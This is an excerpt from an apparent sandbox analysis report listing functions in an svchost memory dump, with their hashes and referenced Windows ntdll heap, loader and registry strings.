                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      • API String ID: 0-1391187441
                                                                                                                      • Opcode ID: bd4311ea88bbdd4f476299d489b0fc39594128a30bcbb6ee06fae9030c50573d
                                                                                                                      • Instruction ID: 5d9398399dc807550d88176a1e5ea75b7c86a0f9ae0dafe8f99a3dd2a340803f
                                                                                                                      • Opcode Fuzzy Hash: bd4311ea88bbdd4f476299d489b0fc39594128a30bcbb6ee06fae9030c50573d
                                                                                                                      • Instruction Fuzzy Hash: F631A336A02214EFDB11EB4ACC85FEEBBF8EF45620F144055E814AB291DB70ED40CB60
                                                                                                                      Function 030429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 03043255
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0304327D
                                                                                                                      • HEAP: , xrefs: 03043264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      • Opcode ID: bbace2d7e2799f763e9d1259a6b70b8320673de338e03871a98d1f1176bc903c
                                                                                                                      • Instruction ID: 9ade8c74490526c6ef082959ba289de0eb00d344367e729cba3a91c48250effe
                                                                                                                      • Opcode Fuzzy Hash: bbace2d7e2799f763e9d1259a6b70b8320673de338e03871a98d1f1176bc903c
                                                                                                                      • Instruction Fuzzy Hash: 1F92CEB4A06249DFDB65CF68C4407AEBBF5FF48300F1888A9E855AB391D735AA41CF50
                                                                                                                      Function 03041F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: cb07d8caae837ed0d22653f17c4e4eb314248db6fbe12b095203b163447a5f08
                                                                                                                      • Instruction ID: 2fafb21f5a73a92fb9dae01c68ada738e3fff0b248f7ce428ab3264011913ff2
                                                                                                                      • Opcode Fuzzy Hash: cb07d8caae837ed0d22653f17c4e4eb314248db6fbe12b095203b163447a5f08
                                                                                                                      • Instruction Fuzzy Hash: 782223706026059FEB25DF29C894B7AFBF9FF46704F18889AE4558F282D732D981CB50
                                                                                                                      Function 03040770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: e364cd44a9a3cca0c904f8c89ba0a83939755a1f9b1df79511728c041ca3e3c5
                                                                                                                      • Instruction ID: ef05a8aa5f5fb6a5d765c3b384102d51e27fdd00a72e21da8ee8b2a5f6b2261d
                                                                                                                      • Opcode Fuzzy Hash: e364cd44a9a3cca0c904f8c89ba0a83939755a1f9b1df79511728c041ca3e3c5
                                                                                                                      • Instruction Fuzzy Hash: 9CF1CE74A02605DFEB15CF69C980B6AF7F5FF46300F1845A9E516AB381D734EA81CB90
                                                                                                                      Function 03031460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 03031712
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03031728
                                                                                                                      • HEAP: , xrefs: 03031596
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: 5131155a6135c34cdd24f37fda2845503ccacd8f171d3b03587a278af397737d
                                                                                                                      • Instruction ID: 71b6bb790aaa30dcc7d52970d434b701228935d94464fe1b6e4033aac520d5a2
                                                                                                                      • Opcode Fuzzy Hash: 5131155a6135c34cdd24f37fda2845503ccacd8f171d3b03587a278af397737d
                                                                                                                      • Instruction Fuzzy Hash: C6E10470A066429FDB29EF68C451BBABBF9EF4A300F18895DE4D6CB245D734E940CB50
                                                                                                                      Function 0303B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                      • API String ID: 0-1145731471
                                                                                                                      • Opcode ID: 8366b02348dd6a29856b650d90c0602db5a3ec8021b021f037a63e81bbbc6d88
                                                                                                                      • Instruction ID: 465d57bba662846ee1cb203a5b25128771fa4bcf7f453c11f62f34a18a094264
                                                                                                                      • Opcode Fuzzy Hash: 8366b02348dd6a29856b650d90c0602db5a3ec8021b021f037a63e81bbbc6d88
                                                                                                                      • Instruction Fuzzy Hash: 78B16D79A067059BDF25CF59C980BAEB7F9EF85714F1849AAE451EB380D730A840CF50
                                                                                                                      Function 030B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      • API String ID: 0-2391371766
                                                                                                                      • Opcode ID: 1224e2c58dca6ce475b8cbadb0a75d439a448bdb417bf86c61173d22a26ed730
                                                                                                                      • Instruction ID: 8cef4213393852eae9d25d298a7328a7d5257a04b391688bc9a41197461d1e8b
                                                                                                                      • Opcode Fuzzy Hash: 1224e2c58dca6ce475b8cbadb0a75d439a448bdb417bf86c61173d22a26ed730
                                                                                                                      • Instruction Fuzzy Hash: 2AB1C179606345EFD321DF54C880FABB7F8EB48710F250969FA409B280D771E854CB96
                                                                                                                      Function 03056962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 0-1077428164
                                                                                                                      • Opcode ID: 48fd9660909fcbafe0606ae504e2909855541e6877aa12d13cb89393a70ebedd
                                                                                                                      • Instruction ID: db0067a8d81a0dff0e710dab4098109e1e964348cdff9e51a3d0d5ef40f3ccd4
                                                                                                                      • Opcode Fuzzy Hash: 48fd9660909fcbafe0606ae504e2909855541e6877aa12d13cb89393a70ebedd
                                                                                                                      • Instruction Fuzzy Hash: 97C27F71A0A3459FEB65CF24C880BABBBE5AFC8744F08896DF989C7240D735D805DB52
                                                                                                                      Function 0302A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: 02a5fae36c0771ef38fd5c9c9de05dc94cd77815fa49e0b67b231cc83cc7291f
                                                                                                                      • Instruction ID: bec9bb0cfd0ac1fe04addd07afa57f14c8aaa75e255bf0ac01f5ae889c261cc7
                                                                                                                      • Opcode Fuzzy Hash: 02a5fae36c0771ef38fd5c9c9de05dc94cd77815fa49e0b67b231cc83cc7291f
                                                                                                                      • Instruction Fuzzy Hash: 24A16F759026299BDB31EF24CC88BEAF7B8EF44700F1401E9E909A7250D7359E85CF64
                                                                                                                      Function 030C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      • API String ID: 0-318774311
                                                                                                                      • Opcode ID: c58aa03a6f47bedac5ceb67c6de7a714305671f027c4fc24d5a2fffd26273c89
                                                                                                                      • Instruction ID: 8e1b131b10ace60d4a8d2ccd58962e0d685b7f5549c8347d836cd234920c0b96
                                                                                                                      • Opcode Fuzzy Hash: c58aa03a6f47bedac5ceb67c6de7a714305671f027c4fc24d5a2fffd26273c89
                                                                                                                      • Instruction Fuzzy Hash: 11817D7962A381AFD361DB14C844B6FB7E8FF85750F048AADB9809B390D778D904CB52
                                                                                                                      Function 0306909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      • API String ID: 0-1537733988
                                                                                                                      • Opcode ID: 6276131d5a07e781d6ed01bea05f4ebec9f53f3c268eee2c66bc83a84c1e6359
                                                                                                                      • Instruction ID: 4d808fe54aa5d3d70425abf4bdfd21c8b46c61fa333f6e82de8584aeec73bce7
                                                                                                                      • Opcode Fuzzy Hash: 6276131d5a07e781d6ed01bea05f4ebec9f53f3c268eee2c66bc83a84c1e6359
                                                                                                                      • Instruction Fuzzy Hash: EB71D17060A7029FC754DF24C980A6FFBE9BFC5718F14891DE4968BA48C731D805CB52
                                                                                                                      Function 0310B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0310B82A
                                                                                                                      • TargetNtPath, xrefs: 0310B82F
                                                                                                                      • GlobalizationUserSettings, xrefs: 0310B834
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      • API String ID: 0-505981995
                                                                                                                      • Opcode ID: 51b98678d81d828f8cfc7390ec0c1270656d1c6ba3392c6f57219685ca39ee6b
                                                                                                                      • Instruction ID: 8d2534f42267dc4ff75920471cb4fddea215a78fae243a8175daf28160760d33
                                                                                                                      • Opcode Fuzzy Hash: 51b98678d81d828f8cfc7390ec0c1270656d1c6ba3392c6f57219685ca39ee6b
                                                                                                                      • Instruction Fuzzy Hash: 31618076D45229AFDB31DF55CC88BDAB7B8AF48714F0141E5A908AB290C774DE80CF90
                                                                                                                      Function 0302F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 0308E6A6
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0308E6C6
                                                                                                                      • HEAP: , xrefs: 0308E6B3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      • API String ID: 0-1340214556
                                                                                                                      • Opcode ID: ad78025c3d509e971d11b987610945a517328c92befa2a9917633ceb226f9f61
                                                                                                                      • Instruction ID: 831b438e11e139893b02a6ef48b8e29e26f30d52751b9167f91c80a4caf2c5de
                                                                                                                      • Opcode Fuzzy Hash: ad78025c3d509e971d11b987610945a517328c92befa2a9917633ceb226f9f61
                                                                                                                      • Instruction Fuzzy Hash: D0510575606755EFE712EBA8C844BAAFBF8FF45340F0804A4E9818B692D774E950CB10
                                                                                                                      Function 030DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 030DDC32
                                                                                                                      • HEAP[%wZ]: , xrefs: 030DDC12
                                                                                                                      • HEAP: , xrefs: 030DDC1F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                      • API String ID: 0-3815128232
                                                                                                                      • Opcode ID: 9b99985b5a885345d76920e159ab1f67f85e9b5bf26bea70ee03f43bfc269ad3
                                                                                                                      • Instruction ID: d336e93cb1fbb7532b48e61f8e6989b342ee8ccb017cbdf5e861736498da7cb1
                                                                                                                      • Opcode Fuzzy Hash: 9b99985b5a885345d76920e159ab1f67f85e9b5bf26bea70ee03f43bfc269ad3
                                                                                                                      • Instruction Fuzzy Hash: CC514635102350CEE7B4DB2EC844776B7E6DF46368F088C8AE4D28F685D676E842DB20
                                                                                                                      Function 0306C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 030A82DE
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 030A82E8
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 030A82D7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: 3a719491c2993c8fec86ab53af88c34d7dd4e4267b9943587b8fb5325507dd3b
                                                                                                                      • Instruction ID: ca8948d27a81a57ade1fcc46248d9c1ec8893e99653b8597da5a269210cdda87
                                                                                                                      • Opcode Fuzzy Hash: 3a719491c2993c8fec86ab53af88c34d7dd4e4267b9943587b8fb5325507dd3b
                                                                                                                      • Instruction Fuzzy Hash: A141E7B5506304ABD724FB68D844B9B77E8EF88750F04492AF998DB294E770D860CBA1
                                                                                                                      Function 030616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpAllocateTls, xrefs: 030A1B40
                                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 030A1B39
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 030A1B4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-4274184382
                                                                                                                      • Opcode ID: 746c33e3a029e07748972c01630bcc6681444b7f0a3be50437c5eaffc3d9dfc9
                                                                                                                      • Instruction ID: afe33bb6095dd969cab7c084685da46875040f6b30b68137df76f40fb8094ef1
                                                                                                                      • Opcode Fuzzy Hash: 746c33e3a029e07748972c01630bcc6681444b7f0a3be50437c5eaffc3d9dfc9
                                                                                                                      • Instruction Fuzzy Hash: 8B41ACB9A02608AFCB19DFA8DC41BEEFBF5FF98714F048519E405AB214D774A910CB90
                                                                                                                      Function 030EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 030EC1F1
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 030EC1C5
                                                                                                                      • PreferredUILanguages, xrefs: 030EC212
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: 85cb76c648f861ef158b72070b1c3081ae5d43d09843220cbbb4f2225a23de45
                                                                                                                      • Instruction ID: f5967b0f60bc7de725feb1b170dfd806e2cd122275fc72e7772925c2f33705b3
                                                                                                                      • Opcode Fuzzy Hash: 85cb76c648f861ef158b72070b1c3081ae5d43d09843220cbbb4f2225a23de45
                                                                                                                      • Instruction Fuzzy Hash: B4418E76E02209EFEB11DAD8C885FEEF7FCAB44700F04406AE905BB290D7759E448B94
                                                                                                                      Function 030C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      • Opcode ID: 334f3714dfe2e4c9e474d33fe5bb4cc3fe6281d6b10dd06a64e0f4a4b8baaae8
                                                                                                                      • Instruction ID: 92b6cb95adaf3b486723f066c926beab352dcda3a44fda2d1c5417010e36fd92
                                                                                                                      • Opcode Fuzzy Hash: 334f3714dfe2e4c9e474d33fe5bb4cc3fe6281d6b10dd06a64e0f4a4b8baaae8
                                                                                                                      • Instruction Fuzzy Hash: 9041C2759127988BEB26DB9AC860BEDB7F8FF95340F1804ADD841AF791D6748901CB10
                                                                                                                      Function 030B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 030B4888
                                                                                                                      • LdrpCheckRedirection, xrefs: 030B488F
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 030B4899
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: 7181af56abaa0d5343fff7b413f45951a94c0332098b691f338f83326f2b2468
                                                                                                                      • Instruction ID: 0847957bdedfaad28cc59097f25d5c438066ad0aff45fadefd42c8959b808662
                                                                                                                      • Opcode Fuzzy Hash: 7181af56abaa0d5343fff7b413f45951a94c0332098b691f338f83326f2b2468
                                                                                                                      • Instruction Fuzzy Hash: 4741D832A027519FCB61CE5AD440AABB7F8EF49A50F090569EC58DB353D730DA10CB91
                                                                                                                      Function 030633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 030A29FE
                                                                                                                      • RtlCreateActivationContext, xrefs: 030A29F9
                                                                                                                      • Actx , xrefs: 030633AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                      • API String ID: 0-859632880
                                                                                                                      • Opcode ID: 513933521200bb33173a16f2dee889a57ad0786bee5283eddc34af6358699a33
                                                                                                                      • Instruction ID: bd2c51098f81c2875909f209309ea3e7480b13d0630bbcdddaea61d61fd49d98
                                                                                                                      • Opcode Fuzzy Hash: 513933521200bb33173a16f2dee889a57ad0786bee5283eddc34af6358699a33
                                                                                                                      • Instruction Fuzzy Hash: 243105366027059FDB26DE58D880B9AB7E8AB84710F0948A9E9059F695C770E851C7D0
                                                                                                                      Function 03061607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeTls, xrefs: 030A1A47
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 030A1A51
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 030A1A40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-931879808
                                                                                                                      • Opcode ID: 7561dffbf46db5cefae2e087ea4183c21bcac627ec5dc2de3673f7fd4770aa08
                                                                                                                      • Instruction ID: 6c60b400fc8507d5de7c7469c8b653de27e2cdcd883c226a323ce5d20f026c64
                                                                                                                      • Opcode Fuzzy Hash: 7561dffbf46db5cefae2e087ea4183c21bcac627ec5dc2de3673f7fd4770aa08
                                                                                                                      • Instruction Fuzzy Hash: 8F314635A02304BFDB2CDB48CD85FBAB6BDEB99714F040469F404BB184E770AD6087A0
                                                                                                                      Function 03071270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0307127B
                                                                                                                      • @, xrefs: 030712A5
                                                                                                                      • BuildLabEx, xrefs: 0307130F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                      • API String ID: 0-3051831665
                                                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                      • Instruction ID: d1a2a365bcf6d8a9e902d2366172bc9b22dd79bab80d3659be72b0c29f22217c
                                                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                      • Instruction Fuzzy Hash: ED319176E0261CAFDB15EF95CC44EEEBBBDEB84750F004425E914AB1A0D730DA05CB58
                                                                                                                      Function 030B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 030B20FA
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 030B20F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 030B2104
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: 7ab6c45cfac0dec26e43bbc2ca1fe94524e47394c2718b6a097fe77428679457
                                                                                                                      • Instruction ID: 58db098fa1d91028d186abf5680badb0e0c4f6342feee99fd7dcdfbdd85a2ff3
                                                                                                                      • Opcode Fuzzy Hash: 7ab6c45cfac0dec26e43bbc2ca1fe94524e47394c2718b6a097fe77428679457
                                                                                                                      • Instruction Fuzzy Hash: 62F0C835642308BFD728E64CDC42FD977BCEB94B54F140855F6507F685D2F0A560CA51
                                                                                                                      Function 030403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
